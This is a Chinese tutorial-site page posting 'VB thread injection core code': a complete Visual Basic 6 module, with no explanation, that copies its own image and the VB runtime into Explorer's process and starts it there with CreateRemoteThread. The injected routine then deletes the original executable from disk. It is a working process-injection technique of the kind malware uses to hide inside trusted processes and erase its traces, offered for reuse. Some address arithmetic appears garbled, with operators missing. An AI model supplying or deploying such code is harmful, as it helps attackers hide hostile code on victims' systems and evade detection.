上一题下一题
跳转到
 
 
  世界如此多姿,发展如此迅速,窥一斑未必还能知全豹。但正如万花筒一样,每一个管窥都色彩斑斓。  
 
 
  知识通道 | 学习首页 | 教师首页 | PK首页 | 知识创造首页 | 企业首页 | 登录
 
本文对应知识领域
VB的线程注入核心代码
作者:未知 申领版权
2010年11月15日 共有 1348 次访问 【添加到收藏夹】 【我要附加题目
受欢迎度:

    
    Option Explicit
    Public Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
    Public Declare Function VirtualAllocEx Lib "kernel32" (ByVal ProcessHandle As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
    Public Declare Function VirtualFreeEx Lib "kernel32" (ByVal ProcessHandle As Long, lpAddress As Any, ByVal dwSize As Long, ByVal dwFreeType As Long) As Long
    Public Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, lpdwProcessId As Long) As Long
    Public Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
    Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As Any, ByVal lpWindowName As Any) As Long
    Public Declare Function CreateRemoteThread Lib "kernel32" (ByVal ProcessHandle As Long, lpThreadAttributes As Long, ByVal dwStackSize As Long, lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long, lpthreadid As Long) As Long
    Public Declare Function CreateThread Lib "kernel32" (ByVal lpThreadAttributes As Any, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long, lpthreadid As Long) As Long
    Public Declare Function GetModuleHandleA Lib "kernel32" (ByVal ModName As Any) As Long
    Public Declare Function WriteProcessMemory Lib "kernel32" (ByVal ProcessHandle As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
    Public Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
    Public Declare Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
    Public Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hwnd As Long, ByVal Msg As Any, ByVal wParam As Any, ByVal lParam As Any) As Long
    Public Declare Function MessageBox Lib "user32" Alias "MessageBoxA" (ByVal hwnd As Long, ByVal lpText As String, ByVal lpCaption As String, ByVal wType As Long) As Long
    Public Declare Function DeleteFile Lib "kernel32" Alias "DeleteFileA" (ByVal lpFileName As String) As Long
    Public Declare Function CreateEvent Lib "kernel32" Alias "CreateEventA" (ByVal lpEventAttributes As Long, ByVal bManualReset As Long, ByVal bInitialState As Long, ByVal lpname As String) As Long
    Public Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Integer, ByVal lpFileName As String, ByVal nSize As Integer) As Integer
    Public Declare Function GetCurrentProcessId Lib "kernel32" () As Long
    Public Declare Function GetMessage Lib "user32" Alias "GetMessageA" (lpMsg As Msg, ByVal hwnd As Long, ByVal wMsgFilterMin As Long, ByVal wMsgFilterMax As Long) As Long
    Public Declare Function TranslateMessage Lib "user32" (lpMsg As Msg) As Long
    Public Declare Function DispatchMessage Lib "user32" Alias "DispatchMessageA" (lpMsg As Msg) As Long
    Public Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long
    Public Declare Function LoadCursor Lib "user32" Alias "LoadCursorA" (ByVal hInstance As Long, ByVal lpCursorName As Any) As Long
    Public Declare Function LoadIcon Lib "user32" Alias "LoadIconA" (ByVal hInstance As Long, ByVal lpIconName As String) As Long
    Public Declare Function CreateFontIndirect Lib "gdi32" Alias "CreateFontIndirectA" (lpLogFont As LOGFONT) As Long
    Public Declare Function DestroyWindow Lib "user32" (ByVal hwnd As Long) As Long
    Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
    Public Declare Function CreateWindowEx Lib "user32" Alias "CreateWindowExA" (ByVal dwExStyle As Long, ByVal lpClassName As String, ByVal lpWindowName As String, ByVal dwStyle As Long, ByVal x As Long, ByVal y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hWndParent As Long, ByVal hMenu As Long, ByVal hInstance As Long, lpParam As Any) As Long
    Public Declare Function SetWindowText Lib "user32" Alias "SetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String) As Long
    Public Declare Function SetWindowLong Lib "user32" Alias "SetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
    Public Declare Function RegisterClass Lib "user32" Alias "RegisterClassA" (Class As WNDCLASS) As Long
    Public Declare Function UnregisterClass Lib "user32" Alias "UnregisterClassA" (ByVal lpClassName As String, ByVal hInstance As Long) As Long
    Public Declare Function DefWindowProc Lib "user32" Alias "DefWindowProcA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
    Public Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, ByVal lpSecurityAttributes As Long, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) As Long
    Public Declare Function ReadFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, ByVal lpOverlapped As Long) As Long
    Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
    Public Declare Function WriteFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, ByVal lpOverlapped As Long) As Long
    Public Declare Function GetFileSize Lib "kernel32" (ByVal hFile As Long, lpFileSizeHigh As Long) As Long
    Public Declare Function GetLastError Lib "kernel32" () As Long
    Public Declare Sub Sleep Lib "kernel32" (ByVal time As Long)
    Public Declare Sub PostQuitMessage Lib "user32" (ByVal nExitCode As Long)
    Public Declare Sub ExitThread Lib "kernel32" (ByVal dwExitCode As Long)
    Public Declare Sub ExitProcess Lib "kernel32" (ByVal dwExitCode As Long)
    Public Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
    
    Public Type POINTAPI
    x As Long
    y As Long
    End Type
    Public Type Msg
    hwnd As Long
    message As Long
    wParam As Long
    lParam As Long
    time As Long
    pt As POINTAPI
    End Type
    Public Type WNDCLASS
    style As Long
    lpfnwndproc As Long
    cbClsextra As Long
    cbWndExtra2 As Long
    hInstance As Long
    hIcon As Long
    hCursor As Long
    hbrBackground As Long
    lpszMenuName As String
    lpszClassName As String
    End Type
    Public Type LOGFONT
    lfHeight As Long
    lfWidth As Long
    lfEscapement As Long
    lfOrientation As Long
    lfWeight As Long
    lfItalic As Byte
    lfUnderline As Byte
    lfStrikeOut As Byte
    lfCharSet As Byte
    lfOutPrecision As Byte
    lfClipPrecision As Byte
    lfQuality As Byte
    lfPitchAndFamily As Byte
    lfFaceName(32) As Byte
    End Type
    
    Public Const GWL_WNDPROC = (-4)
    Public Const WS_VISIBLE = &H10000000
    Public Const WS_CHILD = &H40000000
    Public Const WS_THICKFRAME = &H40000
    Public Const WS_TABSTOP = &H10000
    Public Const WS_BORDER = &H800000
    Public Const WS_OVERLAPPED = &H0&
    Public Const WS_CAPTION = &HC00000
    Public Const WS_SYSMENU = &H80000
    Public Const WS_MINIMIZEBOX = &H20000
    Public Const WS_MAXIMIZEBOX = &H10000
    Public Const WS_OVERLAPPEDWINDOW = (WS_OVERLAPPED Or WS_CAPTION Or WS_SYSMENU Or WS_THICKFRAME Or WS_MINIMIZEBOX Or WS_MAXIMIZEBOX)
    Public Const WS_EX_CLIENTEDGE = &H200&
    Public Const WS_EX_WINDOWEDGE = &H100&
    Public Const WS_EX_STATICEDGE = &H20000
    Public Const WM_SETTEXT = &HC
    Public Const WM_GETTEXTLENGTH = &HE
    Public Const WM_VSCROLL = &H115
    Public Const WM_KEYUP = &H101
    Public Const WM_LBUTTONUP = &H202
    Public Const WM_LBUTTONDOWN = &H201
    Public Const WM_SHOWWINDOW = &H18
    Public Const WM_DESTROY = &H2
    Public Const WM_SETFONT = &H30
    Public Const WM_COPY = &H301
    Public Const WM_PASTE = &H302
    Public Const INVALID_HANDLE_VALUE = -1
    Public Const GENERIC_WRITE = &H40000000
    Public Const GENERIC_READ = &H80000000
    Public Const GENERIC_ALL = &H10000000
    Public Const FILE_ATTRIBUTE_NORMAL = &H80
    Public Const CREATE_NEW = 1
    Public Const CREATE_ALWAYS = 2
    Public Const OPEN_EXISTING = 3
    Public Const OPEN_ALWAYS = 4
    Public Const FILE_SHARE_READ = &H1
    Public Const FILE_SHARE_WRITE = &H2
    Public Const TRUNCATE_EXISTING = 5
    Public Const COLOR_WINDOW = 5
    Public Const IDC_ARROW = 32512&
    Public Const IDI_APPLICATION = 32512&
    Public Const SW_SHOWNORMAL = 1
    Public Const CW_USEDEFAULT = &H80000000
    Public Const gClassName = "CustomClName"
    Public Const gAppName = "Application caption"
    Public ghWnd As Long
    
    Const MEM_COMMIT = &H1000
    Const MEM_RESERVE = &H2000
    Const MEM_RELEASE = &H8000
    Const PAGE_EXECUTE_READWRITE = &H40&
    Const IMAGE_NUMBEROF_DIRECTIRY_ENRIES = 16
    Const STANDARD_RIGHTS_REQUIRED = &HF0000
    Const SYNCHRONIZE = &H100000
    Const PROCESS_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED Or SYNCHRONIZE Or &HFFF)
    
    Type IMAGE_DATA_DIRECTORY
    VirtualAddress As Long
    Size As Long
    End Type
    
    Type IMAGE_FILE_HEADER
    Machine As Integer
    NumberOfSections As Integer
    TimeDataStamp As Long
    PointerToSymbolTable As Long
    NumberOfSymbols As Long
    SizeOfOptionalHeader As Integer
    Characteristics As Integer
    End Type
    
    Type IMAGE_OPTIONAL_HEADER32
    Magic As Integer
    MajorLinkerVersion As Byte
    MinorLinkerVersion As Byte
    SizeOfCode As Long
    SizeOfInitalizedData As Long
    SizeOfUninitalizedData As Long
    AddressOfEntryPoint As Long
    BaseOfCode As Long
    BaseOfData As Long
    ImageBase As Long
    SectionAlignment As Long
    FileAlignment As Long
    MajorOperatingSystemVersion As Integer
    MinorOperatingSystemVersion As Integer
    MajorImageVersion As Integer
    MinorImageVersion As Integer
    MajorSubsystemVersion As Integer
    MinorSubsystemVersion As Integer
    Reserved1 As Long
    SizeOfImage As Long
    SizeOfHeaders As Long
    CheckSum As Long
    Subsystem As Integer
    DllCharacteristics As Integer
    SizeOfStackReserve As Long
    SizeOfStackCommit As Long
    SizeOfHeapReserve As Long
    SizeOfHeapCommit As Long
    LoaerFlags As Long
    NumberOfRvaAndSizes As Long
    DataDirectory(IMAGE_NUMBEROF_DIRECTIRY_ENRIES - 1) As IMAGE_DATA_DIRECTORY
    End Type
    
    Type test
    sz黑吧 As String
    End Type
    
    Type IMAGE_DOS_HEADER
    e_magic As Integer
    e_cblp As Integer
    e_cp As Integer
    e_crlc As Integer
    e_cparhdr As Integer
    e_minalloc As Integer
    e_maxalloc As Integer
    e_ss As Integer
    e_sp As Integer
    e_csum As Integer
    e_ip As Integer
    e_cs As Integer
    e_lfarlc As Integer
    e_onvo As Integer
    e_res(3) As Integer
    e_oemid As Integer
    e_oeminfo As Integer
    e_res2(9) As Integer
    e_lfanew As Long
    End Type
    Const sz黑吧 As String = "ProgMan"
    Global szFileName As String * 261
    Public Sub Main()
    
    Dim PID As Long, ProcessHandle As Long
    Dim Size As Long, BytesWritten As Long, TID As Long, Module As Long, NewModule As Long
    Dim PImageOptionalHeader As IMAGE_OPTIONAL_HEADER32, PImageDosHeader As IMAGE_DOS_HEADER, TImageFileHeader As IMAGE_FILE_HEADER
    Dim ExeVariable As Long
    
    
    GetModuleFileName 0, szFileName, 261
    
    
    GetWindowThreadProcessId FindWindow(sz黑吧, 0&), PID
    
    
    ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, 0, PID)
    
    
    Module = GetModuleHandleA(vbNullString)
    
    
    CopyMemory PImageDosHeader, ByVal Module, Len(PImageDosHeader)
    
    
    CopyMemory PImageOptionalHeader, ByVal (Module PImageDosHeader.e_lfanew 4 Len(TImageFileHeader)), Len(PImageOptionalHeader)
    
    
    Size = PImageOptionalHeader.SizeOfImage
    
    
    VirtualFreeEx ProcessHandle, Module, 0, MEM_RELEASE
    
    
    NewModule = VirtualAllocEx(ProcessHandle, Module, Size, MEM_RESERVE Or MEM_COMMIT, PAGE_EXECUTE_READWRITE)
    
    
    WriteProcessMemory ProcessHandle, ByVal NewModule, ByVal Module, Size, BytesWritten
    
    
    ExeVariable = VirtualAllocEx(ProcessHandle, 0, 261, MEM_RESERVE Or MEM_COMMIT, PAGE_EXECUTE_READWRITE)
    WriteProcessMemory ProcessHandle, ByVal ExeVariable, ByVal szFileName, 261, BytesWritten
    
    
    Dim VBMod As Long, VBSize As Long, VBNewMod As Long
    VBMod = GetModuleHandleA("msvbvm60.dll")
    CopyMemory PImageDosHeader, ByVal VBMod, Len(PImageDosHeader)
    CopyMemory PImageOptionalHeader, ByVal (VBMod PImageDosHeader.e_lfanew 4 Len(TImageFileHeader)), Len(PImageOptionalHeader)
    VBSize = PImageOptionalHeader.SizeOfImage
    VBNewMod = VirtualAllocEx(ProcessHandle, VBMod, VBSize, MEM_RESERVE Or MEM_COMMIT, PAGE_EXECUTE_READWRITE)
    WriteProcessMemory ProcessHandle, ByVal VBNewMod, ByVal VBMod, VBSize, BytesWritten
    
    
    CreateRemoteThread ProcessHandle, ByVal 0, 0, ByVal GetAdd(AddressOf HijackModule), ByVal ExeVariable, 0, TID
    ExitProcess 0
    End Sub
    Private Function GetAdd(Entrypoint As Long) As Long
    GetAdd = Entrypoint
    End Function
    Private Function MainModule(Stuff As Long) As String
    
    Dim BytesWritten As Long, wc As WNDCLASS, szExename As String * 261
    Dim lngFileHandle As Long, lngLength As Long, Exec As String, lBytesRead As Long, szTestName As String
    
    
    ReadProcessMemory OpenProcess(PROCESS_ALL_ACCESS, 0, GetCurrentProcessId), ByVal Stuff, ByVal szExename, 261, ByVal BytesWritten
    
    
    With wc
    .lpfnwndproc = GetAdd(AddressOf WndProc)
    .hbrBackground = 5
    .lpszClassName = "HijackedClass"
    End With
    RegisterClass wc
    
    
    ShowWindow CreateWindowEx(0, "HijackedClass", "Hijacked Form", WS_OVERLAPPEDWINDOW, 100, 100, 340, 240, 0, 0, GetModuleHandleA(0&), ByVal 0&), 1
    
    
    MessageBox 0, "Hijack Module Working", "Sucess!", 0
    
    
    DeleteFile szExename
    
    
    Do: DoEvents: Sleep 100: Loop
    End Function
    Public Function HijackModule(ByVal Stuff As Long) As Long
    
    MainModule Stuff
    End Function
    Public Function WndProc(ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
    If wMsg = &H201 Then MessageBox 0, "提示A", "提示B", 0
    WndProc = DefWindowProc(hwnd, wMsg, wParam, lParam)
    End Function 
    

    

 
相关新闻

testtest
上善制度的炼成
新时代呼唤管理理论创新——大卫�梯斯与动态能力理论
创业的不变逻辑
创新管理需要回答的5个问题
十一、弥离
十、转院
九、生机
八、传染
七、求血
您可能对这些感兴趣  

用VB做定时断线程序
VisualBasic中的界面设计原则和编程技巧
VB6.0与Windows API 间的呼叫技巧
制作可以自动隐藏的弹出式菜单
ListBox中的字符串超长显示的解决方法
VB中的Unicode 和 Ansi 格式
优化程序显示速度
Visual Basic 产生渐层的 Form 背景
用VB实现客户——服务器(TCP/IP)
用VB制作注册软件的方法
题目筛选器
日期:
类型:
状态:
得分: <=
分类:
作者:
职业:
关键字:
搜索
 
 
 
  焦点事件
 
  知识体系
 
  职业列表
 
 
  最热文章
 
 
  最多引用文章
 
 
  最新文章
 
 
 
 
网站介绍 | 广告服务 | 招聘信息 | 保护隐私权 | 免责条款 | 法律顾问 | 意见反馈
版权所有 不得转载
沪ICP备 10203777 号 联系电话:021-54428255
  帮助提示    
《我的太学》是一种全新的应用,您在操作中遇到疑问或者问题,请拨打电话13564659895,15921448526。
《我的太学》